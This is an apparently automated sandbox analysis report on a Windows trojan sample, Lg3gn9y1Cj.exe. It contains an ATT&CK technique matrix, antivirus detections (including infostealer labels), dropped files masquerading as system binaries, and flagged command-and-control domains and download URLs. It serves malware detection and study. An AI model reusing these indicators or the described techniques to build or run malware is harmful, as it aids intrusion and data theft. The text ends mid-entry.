                Default Accounts | 1 Scheduled Task/Job | 11 Windows Service | 11 Windows Service | 11 Deobfuscate/Decode Files or Information | 121 Input Capture | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | 1 Service Execution | 1 Scheduled Task/Job | 411 Process Injection | 3 Obfuscated Files or Information | 1 Credentials in Registry | 44 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | 121 Input Capture | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 File Deletion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | 231 Masquerading | DCSync | 151 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 151 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 411 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 1 System Network Configuration Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

                [Behavior graph not reproduced. Behavior Graph ID: 679096, Sample: Lg3gn9y1Cj.exe, Startdate: 05/08/2022, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label
                Lg3gn9y1Cj.exe | 87% | Virustotal |
                Lg3gn9y1Cj.exe | 100% | ReversingLabs | Win32.Trojan.Swisyn
                Lg3gn9y1Cj.exe | 100% | Avira | TR/Patched.Ren.Gen
                Lg3gn9y1Cj.exe | 100% | Joe Sandbox ML |

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\icsys.icn.exe | 100% | Avira | TR/Patched.Ren.Gen
                C:\Users\user\Desktop\lg3gn9y1cj.exe  | 100% | Avira | TR/Dropper.Gen
                C:\Windows\System\svchost.exe | 100% | Avira | TR/Patched.Ren.Gen
                C:\Windows\System\spoolsv.exe | 100% | Avira | TR/Patched.Ren.Gen
                C:\Users\user\AppData\Roaming\mrsys.exe | 100% | Avira | TR/Patched.Ren.Gen
                C:\Windows\System\explorer.exe | 100% | Avira | TR/Patched.Ren.Gen
                C:\Users\user\AppData\Local\stsys.exe | 100% | Avira | TR/Patched.Ren.Gen
                C:\Users\user\AppData\Local\icsys.icn.exe | 100% | Joe Sandbox ML |
                C:\Users\user\Desktop\lg3gn9y1cj.exe  | 100% | Joe Sandbox ML |
                C:\Windows\System\svchost.exe | 100% | Joe Sandbox ML |
                C:\Windows\System\spoolsv.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Roaming\mrsys.exe | 100% | Joe Sandbox ML |
                C:\Windows\System\explorer.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Local\stsys.exe | 100% | Joe Sandbox ML |
                C:\Users\user\Desktop\lg3gn9y1cj.exe  | 26% | Metadefender |
                C:\Users\user\Desktop\lg3gn9y1cj.exe  | 92% | ReversingLabs | Win32.Infostealer.BluStealer

                Source | Detection | Scanner | Label
                9.0.spoolsv.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                52.2.svchost.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                1.0.lg3gn9y1cj.exe .400000.0.unpack | 100% | Avira | TR/Dropper.Gen
                9.2.spoolsv.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                1.2.lg3gn9y1cj.exe .400000.0.unpack | 100% | Avira | TR/Dropper.Gen
                7.2.spoolsv.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                34.2.explorer.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                4.0.icsys.icn.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                4.2.icsys.icn.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                0.2.Lg3gn9y1Cj.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                52.0.svchost.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                5.2.explorer.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                5.0.explorer.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                8.2.svchost.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                0.0.Lg3gn9y1Cj.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                34.0.explorer.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                8.0.svchost.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                7.0.spoolsv.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

                Source | Detection | Scanner | Label
                zxq.net | 0% | Virustotal |
                vccmd01.zxq.net | 1% | Virustotal |
                64.89.4.0.in-addr.arpa | 0% | Virustotal |
                vccmd03.googlecode.com | 0% | Virustotal |

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                zxq.net | 51.81.194.202 | true | true | | unknown
                icanhazip.com | 104.18.114.97 | true | false | | high
                googlecode.l.googleusercontent.com | 142.250.145.82 | true | false | | high
                vccmd01.zxq.net | 51.81.194.202 | true | true | | unknown
                64.89.4.0.in-addr.arpa | unknown | unknown | false | | unknown
                vccmd03.googlecode.com | unknown | unknown | true | | unknown
                vccmd01.t35.com | unknown | unknown | true | | unknown
                vccmd01.googlecode.com | unknown | unknown | true | | unknown
                vccmd02.googlecode.com | unknown | unknown | true | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://vccmd03.googlecode.com/files/cmsys.gif | false | URL Reputation: safe | unknown
                https://zxq.net/cmsys.gif | true | Avira URL Cloud: safe | unknown
                https://zxq.net/what-happened-to-the-old-zxq-website/ | true | Avira URL Cloud: safe | unknown
                http://icanhazip.com/ | false | | high

                Name | Source | Malicious | Antivirus Detection | Reputation
                                      https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-1024x637.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340255237.000001401B842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://zxq.net/wp-content/uploads/2022/02/ZXQ.pngwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/LimerBoy/StormKittyAppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://zxq.net/about-us/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://zxq.net/the-future-of-cryptocurrency-is-it-time-to-get-your-crypto-license-in-europe/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://zxq.net/#logowhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-76explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://icanhazip.comAppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277673083.00000000072F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://zxq.net/news/technology/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://zxq.net/wp-content/themes/smart-mag/js/jquery.sticky-sidebar.js?ver=7.1.1explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://zxq.net/wp-json/explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.bingmapsportal.comsvchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-768x432.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://zxq.net/wp-content/uploads/2022/07/Best-Mothers-Day-Gifts-of-2022-for-Every-Mom-01-450x253.jexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000020.00000003.337977205.000001401B856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-450x253.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-300x187.pngwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-768x478.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://zxq.net/wp-content/uploads/2022/07/How-To-.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2106explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.ver)svchost.exe, 00000027.00000002.537391592.000001E1CF612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    https://zxq.net/wp-content/uploads/2022/07/How-To--1024x609.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://zxq.net/why-you-should-seek-an-uber-or-lyft-accident-lawyer/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://schema.orgexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                      high
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-45explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 